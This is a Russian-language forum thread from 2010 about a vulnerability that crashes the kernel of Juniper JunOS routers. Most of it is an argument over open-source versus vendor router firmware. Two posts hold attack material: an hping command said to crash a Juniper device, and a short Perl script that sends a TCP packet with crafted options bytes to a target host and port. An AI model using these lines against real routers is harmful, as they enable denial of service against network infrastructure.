форумы  помощь  поиск  регистрация  майллист  вход/выход  слежка

Вариант для распечатки		Пред. тема | След. тема
Форум Разговоры, обсуждение новостей
Изначальное сообщение		[ Отслеживать ]

Сообщения по теме

[Сортировка по времени | RSS]

1. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
Сообщение от Аноним (??) on 08-Янв-10, 22:40
С учетом того, что в JunOS используется код FreeBSD, нет ли подобной дыры в других *BSD системах ?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	2. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от Hety (??) on 08-Янв-10, 22:53
	Фряшный код используется не во всех подсистемах. Деталей не помню, но есть вероятность, что сетевая как раз своя. Или, как минимум, была обработана напильником.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

3. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
Сообщение от chemtech on 09-Янв-10, 10:54
Была бы свободная прошивка, накатил патч, а тут ждать когда они обновят прошивку и не факт что еще все дыры залатали...
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	5. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от Lindemidux (??) on 09-Янв-10, 15:52
	У d-link свободная прошивка, попробуй накатай патч.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	6. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	–2 +/–
	Сообщение от User294 (ok) on 09-Янв-10, 16:40
	>У d-link свободная прошивка, попробуй накатай патч. У меня именно таким манером в свое время был Д-линк ... с прошивкой от сторонних авторов (McMcc). Да и на ряд длинков с эзернетом нынче подходят прошивки "от Олега". Кстати вполне обычна ситуация когда дыры и назойливые баги (вплоть до ляпов не позволяющих юзать девайс в нужной конфигурации вообще, как это бывало с типовой для России связкой DHCP+PPTP например) в сторонних прошивках фиксятся шибко быстрее чем раздуплятся вендоры. И это большой плюс опенсорсных прошивок. Можно сосать месяцами, менять два десятка девайсов, прыгать с бубном и прочая. А можно влить фирмваре от местных спецов, которые в вопросе разбираются и в курсе "национальных особенностей" и через 10 минут все будет работать. Лучше чем оригинал, как правило. Ну да, бздунам с их всеобщим счастьем для закрывателей сорсов такое ессно не светит. Пусть наслаждаются своими блобами и тотальной зависимостью от вендора с невозможностью без большого траха исправить самолично жалкие пару байтов чтобы исправить какую-то вот такую вот хрень.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	10. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	–2 +/–
	Сообщение от arachnid (??) on 09-Янв-10, 22:13
	осподи, опять крышу снесло от букв bsd? ps. а что делать, если не будет очередного Олега, а юзер? ты сам готов прошивку писать? а то вот например сейчас очень популяы насы на линухе, а вот прошивок для них как-то тухло. чего бы не приложиться?
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	11. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от vitek (??) on 10-Янв-10, 00:37
	а его уже как полтора года нет. нашлись другие - http://code.google.com/p/wl500g/ проблем то. там то его собрать, что бзишнегу мир. >а то вот например сейчас очень популяы насы на линухе, а вот прошивок для них как-то тухло. чего бы не приложиться? давай насу. приложусь. зы: крышу то держи. а то с выдувает всё то из под неё то.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	13. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от arachnid (ok) on 10-Янв-10, 15:54
	>а его уже как полтора года нет. >нашлись другие - http://code.google.com/p/wl500g/ >проблем то. там то его собрать, что бзишнегу мир. >>а то вот например сейчас очень популяы насы на линухе, а вот прошивок для них как-то тухло. чего бы не приложиться? > >давай насу. приложусь. > >зы: >крышу то держи. а то с выдувает всё то из под неё >то. идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока почему то не удалось сделать свою. http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока "Олега" на это устройство не наблюдается. а что касаемо крыши - так я же не бегаю по топикам, где светятся буквы gpl и не поливаю говном ее использующих.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	16. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от User294 (ok) on 10-Янв-10, 20:55
	А в чем было поливание говном? Я констатировал факт что при наличии сорсов тупые баги зачастую чинятся локально куда быстрее чем пока там снимется с тормоза вендор. Это теперь уже считается за поливание говном? Да вы совсем уж с дуба рухнули с вашим фанатизмом. Ну да, конечно, орать про свободу на форуме - это одно, а починить тупой баг в фирмваре по быстренькому - другое. Как по мне - предпочитаю фактическую свободу вместо громких деклараций о всеобщем счастье.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	29. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от boykov (ok) on 18-Янв-10, 17:57
	> >идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока >почему то не удалось сделать свою. > >http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока "Олега" на это устройство не >наблюдается. > а оно надо этому девайсу? с вайфаем -- была острая необходимость. здесь то что?
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	32. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от arachnid (ok) on 19-Янв-10, 08:19
	>> >>идешь на сайт интела и берешь прошивку. все просто. правда энтузиастам пока >>почему то не удалось сделать свою. >> >>http://www.intel.com/support/ru/motherboards/server/ss4000-e/ - вот оно. как то пока "Олега" на это устройство не >>наблюдается. >> > >а оно надо этому девайсу? >с вайфаем -- была острая необходимость. здесь то что? а здесь - потрясающе низкая скорость работы сетевого накопителя.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	14. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от User294 (ok) on 10-Янв-10, 20:42
	> ps. а что делать, если не будет очередного Олега, а юзер? ты сам готов прошивку писать? Я осваиваю OpenWRT и связанные с ним околосистемные дела. Весьма осмысленная такая штука - как раз для создания на его основе своих прошивок под свои вкусы и цели. Мне нравится. И с нуля ничего писать не надо, в общем то. Велосипедостроение - удел проприетарщиков и жлобов. Базовых платформ - не так уж и много и какая-никакая поддержка оных уже вколупана. Да, ессно мне до высот как у матерых системщиков пока далековато. Но в конце концов не боги горшки обжигают. Предпочитаю учиться что-то делать сам чем подлизывать "божкам" из [тут проприетарная контора по вкусу] в надежде на их милость. Попробовав и так и сяк пришел к выводу что так мне нравится больше. > а вот прошивок для них как-то тухло. чего бы не приложиться? Ну, кому интересно это направлене - в своем праве поприкладываться. Я пока подсел на OpenWRT, а это все-таки не NAS. Да и где-то на уровне интуиции понятно что NAS как класс soho девайсов вероятно умрет - ИМХО интеграция в SOHO вскоре вгонит все в 1 универсальный девайс вида "роутер + wi-fi + HDD". Как в свое время умерли КПК в пользу более интегренных коммуникаторов. Если Marvell запозиционирует свои процы как платформу для роутерообразных штук и у меня будет такая железяка - я с удовольствием с ней покопаютсь. А в данный момент мне и так есть где приложиться.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	18. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от arachnid (ok) on 10-Янв-10, 21:52
	"Ну да, бздунам с их всеобщим счастьем для закрывателей сорсов такое ессно не светит" - то есть это взвешенный и аргументированный коммент?
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	19. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от User294 (ok) on 10-Янв-10, 22:28
	Да, кой-в чем вы правы: надо стараться избегать таких оборотов провоцирующих на колкости в ответ. Однако со своей стороны замечу что меня интересуют технические моменты а не кидание какашками и выяснение какие козлы собеседники. И вот в этом плане я что-то внятных контр-аргументов не вижу.Зато рассказать мне какой я козел - это всегда пожалуйста.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	20. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от arachnid (ok) on 10-Янв-10, 23:30
	>Да, кой-в чем вы правы: надо стараться избегать таких оборотов провоцирующих на >колкости в ответ. Однако со своей стороны замечу что меня интересуют >технические моменты а не кидание какашками и выяснение какие козлы собеседники. >И вот в этом плане я что-то внятных контр-аргументов не вижу.Зато >рассказать мне какой я козел - это всегда пожалуйста. ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве нет? опять же - никакая лицензия не заставит выпустить производителя выпускать обновления быстро. то есть в данном случае я не вижу связи между сообществом freeBSD и выпуском джунипером обновлений. так же, например, как между длинком, выпускающем soho-роутеры на линухе, и боте-нете на оных и собственно самим линухом.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	30. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от User294 (ok) on 18-Янв-10, 18:30
	>ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве нет? Как >опять же - никакая лицензия не заставит выпустить производителя >выпускать обновления быстро. Да, вот только для длинков и асусов всяких, с их GPL - желающие сами могут запатчить большинство ляпов. Посему те кто не хочет быть рассадником ботов, глюков, багв и делать вендору годами минет в надежде что все это может быть починят (а может быть и нет, какие гарантии то?) - получают шанс потрепыхаться сами. И я не понимаю какого хрена у них за их бабки этого шанса быть не должно. >то есть в данном случае я не вижу связи между сообществом >freeBSD и выпуском джунипером обновлений. Именно. Между сообществом и вендором связи никакой. И на самом деле это - dead way. Коллаборативная работа над проблемой - заруливает растаскивание по углам с большим отрывом. >так же, например, как между длинком, выпускающем soho-роутеры на линухе, >и боте-нете на оных и собственно самим линухом. В случае линуха - если мне влом быть куском ботнета, я могу накрайняк переколупать фирмваре сам, возможно с целой групкой тех кто считает так же. Откусив или починив проблемный функционал. И даже могу раздать фирмваре другим. Мне это как-то более симпатично в таком виде, если что.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	33. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от arachnid (ok) on 19-Янв-10, 08:38
	>>ну я бы сказал, что подобная реакция заслуженна определенным поведением, разве нет? > >Как > как заслуженна? еще раз отрывок из коммента выше напомнить? :) >>опять же - никакая лицензия не заставит выпустить производителя >>выпускать обновления быстро. > >Да, вот только для длинков и асусов всяких, с их GPL - >желающие сами могут запатчить большинство ляпов. Посему те кто не хочет >быть рассадником ботов, глюков, багв и делать вендору годами минет в >надежде что все это может быть починят (а может быть и >нет, какие гарантии то?) - получают шанс потрепыхаться сами. И я >не понимаю какого хрена у них за их бабки этого шанса >быть не должно. то устройство, на которое я ссылался, тоже на линухе с gpl. и? >>то есть в данном случае я не вижу связи между сообществом >>freeBSD и выпуском джунипером обновлений. > >Именно. Между сообществом и вендором связи никакой. И на самом деле это >- dead way. Коллаборативная работа над проблемой - заруливает растаскивание по >углам с большим отрывом. ну во первых, неизвестно, проблема это самой фри или доработок напильником джунипера. это раз. второе - в случае сильной доработки напильником и невозвращения изменений производитель рискует остаться на бобах - с каждым изменением ему приходиться пилить заново. знаю парочку таких контор - одни на линухе, другие на фре - обе используют версии 10летней давности. > >>так же, например, как между длинком, выпускающем soho-роутеры на линухе, >>и боте-нете на оных и собственно самим линухом. > >В случае линуха - если мне влом быть куском ботнета, я могу >накрайняк переколупать фирмваре сам, возможно с целой групкой тех кто считает >так же. Откусив или починив проблемный функционал. И даже могу раздать >фирмваре другим. Мне это как-то более симпатично в таком виде, если >что. я не про это. да, мне тоже больше нравиться открытость и возможность настроить железку так, как надо мне, а не стандартному пользователю. но это уже не в контексте обсуждаемой проблемы.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	22. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от Юрий (??) on 11-Янв-10, 05:22
	>Если Marvell запозиционирует >свои процы как платформу для роутерообразных штук и у меня будет >такая железяка - я с удовольствием с ней покопаютсь. А в >данный момент мне и так есть где приложиться. Так покопайтесь с Time Capsule - внутри 100% Marvell
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	31. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от User294 (ok) on 18-Янв-10, 18:42
	>Так покопайтесь с Time Capsule - внутри 100% Marvell Это чего-то яббловское как я понял? От продукции яббла я предпочитаю держаться подальше, слишком уж противный и ограничительный вендор, даже хуже MS имхо, т.к. задранные цены + в их железках всегда найдется какая-то пакость которая отравит удовольствие от обладания девайсом. Да и если у вас нет мака (а мне и без него хорошо) - яббловские железки обычно не слишком ориентированы на всех остальных. Вот если несколько более-менее нейтральных вендоров начнут юзать платформу для роутеров, я к ней присмотрюсь, факт. P.S. а вообще, честное пионерское, мне есть с чем поковыряться в свое удовольствие и я в состоянии выбрать себе предметы ковыряния сам. Без всяких ябблов на горизонте.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	28. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+1 +/–
	Сообщение от анон on 15-Янв-10, 08:29
	йо. ваше маниакальное стремление пересадить всех на опенсорц напоминает РМС. хотите использовать в ядре сети железку с прошивкой "от олега" - ваше дурное право. но пропагандировать свою дурь это уж через чур. да, кстати. сетевые железки - большой бизнес. а в бизнесе не будет ничего открытого, ибо конкуренция и коммерческая тайна.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	8. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от Ъ on 09-Янв-10, 19:58
	>У d-link свободная прошивка В каком месте? ftp://dlink.ru/pub/  как-то не на что не наблюдается.
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	15. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от User294 (ok) on 10-Янв-10, 20:45
	А в ftp://dlink.ru/pub/ADSL/GPL_source_code/ интересно чего? :) А так - да, некоторые типа длинка довольно раздолбайски относятся к выкладыванию сорсов. Потому то и есть всякие GPLviolations.org :)
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

4. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+2 +/–
Сообщение от cvsup (ok) on 09-Янв-10, 13:56
Видео: http://praetorianprefect.com/archives/2010/01/junos-juniper-.../
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

7. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
Сообщение от аноним on 09-Янв-10, 19:02
да. Ынтерпрайз баги, классика... классика, конечно, пинг смерти, но и это сойдёт
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

9. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
Сообщение от XoRe (ok) on 09-Янв-10, 21:53
>Подробностей по поводу того каким образом должен быть сформирован пакет >не сообщается. Можно попробовать подойти к вопросу с точки зрения комбинаторики. Нагенерить 2 в степени n пакетов и поотсылать их устройству. На каком пакете упадет, тот левый)
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	17. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от User294 (ok) on 10-Янв-10, 21:03
	А чему равно n? А то скажем 2^128 пакетоы вы обломитесь послать пожалуй :)
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

12. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
Сообщение от vgray (??) on 10-Янв-10, 10:38
посмотрел видео, попробовал. там в описании ошибка небольшая. но все работает hping -c 1 -p 23 -L 0 -M 0 192.168.10.210 -S -E ./jun/1012 -d 10 -O 7 убивает 9й джун наповал.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

21. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
Сообщение от Аноним (??) on 11-Янв-10, 04:23
А можно содержимое файлика /jun/1012. Всё равно 23-й порт закрыт от обычных пользователей.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

	23. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
	Сообщение от vgray (??) on 11-Янв-10, 05:34
	>А можно содержимое файлика /jun/1012. Всё равно 23-й порт закрыт от обычных >пользователей. увы не скажу, так как даже если порт закрыт ACL то все равно джунипер валится. Попробуйте почитать исходную новость и попробовать самим подобрать содержимое файла
	Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

24. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
Сообщение от Аноним (??) on 11-Янв-10, 07:11
Ясно. Тогда я не оценил масштабов трагедии.
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

25. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+/–
Сообщение от Аноним (??) on 11-Янв-10, 08:55
Если не сложно можно связаться с Вами для уточнения содержимого пакета, так как подбор не помог и Жунипер не отреагировал, встает вопрос версия не восприимчива или просто не правильно сформирован пакет?
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

27. "Уязвимость в маршрутизаторах Juniper, приводящая к краху ядр..."	+1 +/–
Сообщение от luzers on 11-Янв-10, 14:27
#!/usr/bin/perl my $host = shift; my $port = shift; use Net::Packet qw($Env); use Net::Packet::IPv4; my $ip = Net::Packet::IPv4->new(dst => $host); use Net::Packet::TCP; my $tcp = Net::Packet::TCP->new( dst => $port, options => "\x65\x02\x01\x01", ); use Net::Packet::Frame; my $frame = Net::Packet::Frame->new(l3 => $ip, l4 => $tcp); $frame->send; exit 0;
Высказать мнение | Ответить | Правка | ^ | Наверх | Cообщить модератору

Архив | Удалить

Рекомендовать для помещения в FAQ | Индекс форумов | Темы | Пред. тема | След. тема